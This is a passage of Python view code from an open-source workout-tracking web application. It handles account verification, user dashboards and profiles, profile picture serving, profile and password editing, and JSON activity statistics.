        user = form.bind(User(), exclude=['password_confirm'])
        user.verified = False
        user.verification_token = get_verification_token()
        context.add_user(user)
        # send a verification link to the user email address
        send_verification_email(request, user)
        user.verification_tokens_sent += 1
        # Send to login
        return HTTPFound(location=request.resource_url(context))
    return {
        'form': OWFormRenderer(form)
    }
@view_config(
    context=User,
    name="verify",
    renderer='ow:templates/verify.pt')
def verify(context, request):
    """
    Verify a user account from the token link sent by email.

    The token is expected as the first subpath element
    (``.../verify/<token>``). On success the user is marked verified,
    logged in automatically and redirected to her dashboard; otherwise an
    informational page is rendered.
    """
    redirect_url = request.resource_url(context)
    # user has been verified already, send to dashboard
    if getattr(context, 'verified', False):
        return HTTPFound(location=redirect_url)
    # Look for a verification token, then check if we can verify the user with
    # that token
    verified = len(request.subpath) > 0
    token = getattr(context, 'verification_token', False)
    verified = verified and token and str(token) == request.subpath[0]
    if verified:
        # verified, log in automatically and send to the dashboard
        context.verified = True
        headers = remember(request, str(context.uid))
        return HTTPFound(location=redirect_url, headers=headers)
    # if we can not verify the user, show a page with some info about it
    return {}
@view_config(
    context=User,
    name="resend-verification-link")
def resend_verification_link(context, request):
    """
    Send an email with the verification link, only if the user has not
    been verified yet.

    At most a few verification emails are ever sent (the counter is capped
    below); the outcome is reported back on the login page through the
    ``message`` query parameter.
    """
    # the message to be shown when the user gets back to the login page
    query = {'message': 'already-verified'}
    if not context.verified:
        tokens_sent = getattr(context, 'verification_tokens_sent', 0)
        if tokens_sent > 3:
            # more than three tokens already sent, stop re-sending
            query = {'message': 'max-tokens-sent', 'email': context.email}
        else:
            if context.verification_token is None:
                # for some reason the verification token is not there, get one
                context.verification_token = get_verification_token()
            send_verification_email(request, context)
            context.verification_tokens_sent = tokens_sent + 1
            query = {'message': 'link-sent', 'email': context.email}
    # Send to login
    url = request.resource_url(request.root, 'login', query=query)
    return HTTPFound(location=url)
@view_config(
    context=OpenWorkouts,
    name='forgot-password',
    renderer='ow:templates/forgot_password.pt')
def recover_password(context, request):  # pragma: no cover
    # WIP
    # NOTE(review): unfinished view — the Form instance is discarded and
    # the view returns None, which will break the configured renderer if
    # this route is ever exercised. Finish or remove before enabling.
    Form(request)
@view_config(
    context=User,
    permission='view',
    renderer='ow:templates/dashboard.pt')
def dashboard(context, request):
    """
    Render a dashboard for the current user.

    The ``year``/``month`` GET parameters select which workouts are shown;
    when missing, the latest year (and its latest month) with activity is
    picked automatically.
    """
    # Look at the year we are viewing, if none is passed in the request,
    # pick up the latest/newer available with activity
    viewing_year = request.GET.get('year', None)
    if viewing_year is None:
        available_years = context.activity_years
        if available_years:
            viewing_year = available_years[0]
    else:
        # ensure this is an integer
        viewing_year = int(viewing_year)
    # Same for the month, if there is a year set
    viewing_month = None
    if viewing_year:
        viewing_month = request.GET.get('month', None)
        if viewing_month is None:
            available_months = context.activity_months(viewing_year)
            if available_months:
                # we pick up the latest month available for the year,
                # which means the current month in the current year
                viewing_month = available_months[-1]
        else:
            # ensure this is an integer
            viewing_month = int(viewing_month)
    # pick up the workouts to be shown in the dashboard
    workouts = context.workouts(viewing_year, viewing_month)
    return {
        'current_year': datetime.now(timezone.utc).year,
        'current_day_name': datetime.now(timezone.utc).strftime('%a'),
        'month_name': month_name,
        'viewing_year': viewing_year,
        'viewing_month': viewing_month,
        'workouts': workouts
    }
@view_config(
    context=OpenWorkouts,
    name='profile',
    permission='view',
    renderer='ow:templates/profile.pt')
@view_config(
    context=User,
    permission='view',
    name='profile',
    renderer='ow:templates/profile.pt')
def profile(context, request):
    """
    "public" profile view, showing some workouts from this user, her
    basic info, stats, etc.

    Reachable both on a user object and on the root object, where the
    first subpath element is interpreted as the user's nickname.
    The ``year``/``month``/``week`` GET parameters filter the workouts
    shown (defaulting to the current year/month).
    """
    if isinstance(context, OpenWorkouts):
        # accessed on the root object: resolve the user from the subpath
        nickname = request.subpath[0]
        user = request.root.get_user_by_nickname(nickname)
        if user is None:
            return HTTPNotFound()
    else:
        user = context
    now = datetime.now(timezone.utc)
    year = int(request.GET.get('year', now.year))
    month = int(request.GET.get('month', now.month))
    week = request.GET.get('week', None)
    workouts = user.workouts(year, month, week)
    # aggregate distance / duration / climbed elevation over the shown
    # workouts; missing or falsy attributes count as zero
    totals = {
        'distance': Decimal(0),
        'time': timedelta(0),
        'elevation': Decimal(0)
    }
    for workout in workouts:
        totals['distance'] += (
            getattr(workout, 'distance', Decimal(0)) or Decimal(0))
        totals['time'] += (
            getattr(workout, 'duration', timedelta(0)) or timedelta(0))
        totals['elevation'] += (
            getattr(workout, 'uphill', Decimal(0)) or Decimal(0))
    localizer = get_localizer(request)
    # translate the user's gender code to a localized label
    user_gender = _('Unknown')
    for g in get_gender_names():
        if g[0] == user.gender:
            user_gender = localizer.translate(g[1])
    return {
        'user': user,
        'user_gender': user_gender,
        'workouts': workouts,
        'current_month': '{year}-{month}'.format(
            year=str(year), month=str(month).zfill(2)),
        'current_week': week,
        'totals': totals
    }
@view_config(
    context=User,
    name='picture',
    permission='view')
def profile_picture(context, request):
    """
    Serve the user's profile picture, optionally scaled down.

    The ``size`` GET parameter requests a ``size x size`` bounding box;
    Pillow's ``thumbnail`` keeps the aspect ratio. Images are never scaled
    up beyond their original size.
    """
    if context.picture is None:
        return HTTPNotFound()
    # NOTE(review): a non-numeric ``size`` value would raise ValueError in
    # the int() conversion below (-> 500); confirm whether it should fall
    # back to the original size instead
    size = request.GET.get('size', 0)
    # we will need a tuple, it does not matter if both values are the same,
    # Pillow will keep aspect ratio
    size = (int(size), int(size))
    image = Image.open(context.picture.open())
    if size > (0, 0) and size < image.size:
        # resize only if they are asking for smaller size, prevent
        # someone asking for a "too big" image
        # (tuple comparison against image.size is lexicographic)
        image.thumbnail(size)
    body_file = BytesIO()
    image.save(body_file, format=image.format)
    return Response(content_type='image', body=body_file.getvalue())
@view_config(
    context=User,
    permission='edit',
    name='edit',
    renderer='ow:templates/edit_profile.pt')
def edit_profile(context, request):
    """
    Render and process the "edit profile" form for the given user.

    On a valid POST the user object is updated (keeping the current picture
    when no new one was uploaded), reindexed, and the ``_LOCALE_`` cookie
    is refreshed before redirecting to the public profile view.
    """
    default_locale = request.registry.settings.get(
        'pyramid.default_locale_name')
    current_locale = request.cookies.get('_LOCALE_', default_locale)
    # if not given a file there is an empty byte in POST, which breaks
    # our blob storage validator.
    # dirty fix until formencode fixes its api.is_empty method
    if isinstance(request.POST.get('picture', None), bytes):
        request.POST['picture'] = ''
    nicknames = request.root.lowercase_nicknames
    if context.nickname:
        # remove the current user nickname from the list, preventing form
        # validation error
        nicknames.remove(context.nickname.lower())
    state = State(emails=request.root.lowercase_emails, names=nicknames)
    form = Form(request, schema=UserProfileSchema(), state=state, obj=context)
    if 'submit' in request.POST and form.validate():
        # No picture? do not override it
        if not form.data['picture']:
            del form.data['picture']
        form.bind(context)
        # reindex
        request.root.reindex(context)
        # set the cookie for the locale/lang
        request.response.set_cookie('_LOCALE_', form.data['locale'])
        current_locale = form.data['locale']
        # Saved, send the user to the public view of her profile
        return HTTPFound(location=request.resource_url(context, 'profile'),
                         headers=request.response.headers)
    # prevent crashes on the form
    if 'picture' in form.data:
        del form.data['picture']
    localizer = get_localizer(request)
    # localized option lists for the gender and locale selectors
    gender_names = [
        (g[0], localizer.translate(g[1])) for g in get_gender_names()]
    available_locale_names = [
        (l[0], localizer.translate(l[1])) for l in get_available_locale_names()
    ]
    return {'form': OWFormRenderer(form),
            'timezones': common_timezones,
            'gender_names': gender_names,
            'available_locale_names': available_locale_names,
            'current_locale': current_locale}
@view_config(
    context=User,
    permission='edit',
    name='passwd',
    renderer='ow:templates/change_password.pt')
def change_password(context, request):
    """
    Show the change-password form; on a valid POST store the new password
    and redirect the user to her public profile.
    """
    state = State(user=context)
    form = Form(request, schema=ChangePasswordSchema(), state=state)
    if 'submit' in request.POST and form.validate():
        context.password = form.data['password']
        return HTTPFound(location=request.resource_url(context, 'profile'))
    return {'form': OWFormRenderer(form)}
@view_config(
    context=User,
    permission='view',
    name='week')
def week_stats(context, request):
    """
    Return the user's current-week statistics as a JSON response, one
    entry per day with localized (3-letter) day names.
    """
    localizer = get_localizer(request)
    stats = context.week_stats
    payload = []
    for day in stats:
        data = stats[day]
        hours = timedelta_to_hms(data['time'])[0]
        short_name = localizer.translate(weekday_name[day.weekday()])[:3]
        payload.append({
            'name': short_name,
            'time': str(hours).zfill(2),
            'distance': int(round(data['distance'])),
            'elevation': int(data['elevation']),
            'workouts': data['workouts']
        })
    return Response(content_type='application/json',
                    charset='utf-8',
                    body=json.dumps(payload))
@view_config(
    context=User,
    permission='view',
    name='monthly')
def last_months_stats(context, request):
    """
    Return a json-encoded stream with statistics for the last 12 months,
    one entry per month with localized (3-letter) month names and a link
    to the corresponding profile page.
    """
    localizer = get_localizer(request)
    stats = context.yearly_stats
    # this sets which month is 2 times in the stats, once this year, once
    # the previous year. We will show it a bit different in the UI (showing
    # the year too to prevent confusion)
    repeated_month = datetime.now(timezone.utc).date().month
    json_stats = []
    # each key is indexed as (year, month-number) — month[0]/month[1] below
    for month in stats:
        hms = timedelta_to_hms(stats[month]['time'])
        name = localizer.translate(month_name[month[1]])[:3]
        if month[1] == repeated_month:
            name += ' ' + str(month[0])
        month_stats = {
            'id': str(month[0]) + '-' + str(month[1]).zfill(2),
            'name': name,
            'time': str(hms[0]).zfill(2),
            'distance': int(round(stats[month]['distance'])),
            'elevation': int(stats[month]['elevation']),
            'workouts': stats[month]['workouts'],
            'url': request.resource_url(
                context, 'profile',
                query={'year': str(month[0]), 'month': str(month[1])})
        }
        json_stats.append(month_stats)
    return Response(content_type='application/json',
                    charset='utf-8',
                    body=json.dumps(json_stats))
@view_config(
    context=User,
    permission='view',
    name='weekly')
def last_weeks_stats(context, request):
    """
    Return a json-encoded stream with statistics for the last 12-months, but
    in a per-week basis, each entry linking to the corresponding profile
    page filtered by year/month/week.
    """
    localizer = get_localizer(request)
    stats = context.weekly_year_stats
    # this sets which month is 2 times in the stats, once this year, once
    # the previous year. We will show it a bit different in the UI (showing
    # the year too to prevent confusion)
    repeated_month = datetime.now(timezone.utc).date().month
    json_stats = []
    # each key looks like (year, month, week-id, week-number-in-month)
    for week in stats:
        hms = timedelta_to_hms(stats[week]['time'])
        name = localizer.translate(month_name[week[1]])[:3]
        if week[1] == repeated_month:
            name += ' ' + str(week[0])
        week_stats = {
            'id': '-'.join(
                [str(week[0]), str(week[1]).zfill(2), str(week[2])]),
            'week': str(week[3]),  # the number of week in the current month
            'name': name,
            'time': str(hms[0]).zfill(2),
            'distance': int(round(stats[week]['distance'])),
            'elevation': int(stats[week]['elevation']),
            'workouts': stats[week]['workouts'],
            'url': request.resource_url(
                context, 'profile',
                query={'year': str(week[0]),
                       'month': str(week[1]),
                       'week': str(week[2])})
        }
        json_stats.append(week_stats)
    return Response(content_type='application/json',
                    charset='utf-8',
                    body=json.dumps(json_stats))
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.